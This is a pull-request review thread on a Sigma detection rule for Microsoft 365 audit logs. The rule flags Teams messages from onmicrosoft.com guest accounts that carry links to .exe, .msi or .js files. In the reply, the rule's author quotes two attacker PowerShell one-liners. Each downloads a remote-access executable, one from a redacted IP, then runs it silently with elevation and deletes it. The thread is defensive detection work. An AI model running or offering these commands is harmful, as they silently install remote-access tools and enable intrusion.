rules/cloud/m365/audit/microsoft365_teams_guest_rmm_deployment.yml

```diff
@@ -0,0 +1,56 @@
+title: Detection of Potential Malicious Guest Accounts and RMM Tool Deployment via Teams
+id: aed9c24f-097a-4505-af85-74b4b83982b0
+status: experimental
+description: Detects potential malicious guest accounts using onmicrosoft.com and deployment of RMM tools via Teams messages.
+references:
+    - https://securityaffairs.com/170311/cyber-crime/black-basta-ransomware-microsoft-teams.html
+    - https://www.bleepingcomputer.com/news/security/black-basta-ransomware-poses-as-it-support-on-microsoft-teams-to-breach-networks/
+author: Saiprashanth Pulisetti ( @pulisettis )
+date: 2024-11-01
+tags:
+    - attack.initial-access
+    - attack.t1078
+    - attack.execution
+    - attack.persistence
+    - attack.t1133
+    - attack.defense-evasion
+    - attack.t1070
+    - attack.collection
+    - attack.t1114
+logsource:
+    product: m365
+    service: audit
+detection:
+    selection_domain:
+        user.email: '*@*.onmicrosoft.com'
+    selection_extensions:
+        o365.audit.MessageURLs|endswith:
+            - .exe
+            - .msi
+            - .js
```

Comment:
What's the reasoning behind selecting these extensions and not something else?

Reply:
Hi @nasbench ; recently I was working with a client and they had a massive email bombing attack followed by an teams guest message and then they sent a payload which contains a fake RMM tool so there are two messages the attacker sent via teams one is directly https://anydesk.com which is something similar to 

`Start-Process powershell -ArgumentList 'Invoke-WebRequest -Uri "https://download.anydesk.com/AnyDesk.exe" -OutFile "$env:TEMP\AnyDesk.exe"; Start-Process -FilePath "$env:TEMP\AnyDesk.exe" -ArgumentList "/silent" -Wait; Remove-Item -Path "$env:TEMP\AnyDesk.exe" -Force' -Verb RunAs`

and there is another message with IP as their URL ( could be a C2C ) :

`Start-Process powershell -ArgumentList 'Invoke-WebRequest -Uri "https://xxx.xx.xx.xx/RMM.exe" -OutFile "$env:TEMP\AnyDesk.exe"; Start-Process -FilePath "$env:TEMP\AnyDesk.exe" -ArgumentList "/silent" -Wait; Remove-Item -Path "$env:TEMP\AnyDesk.exe" -Force' -Verb RunAs`

So this is the reason why I've kept with .exe, .msi or .js.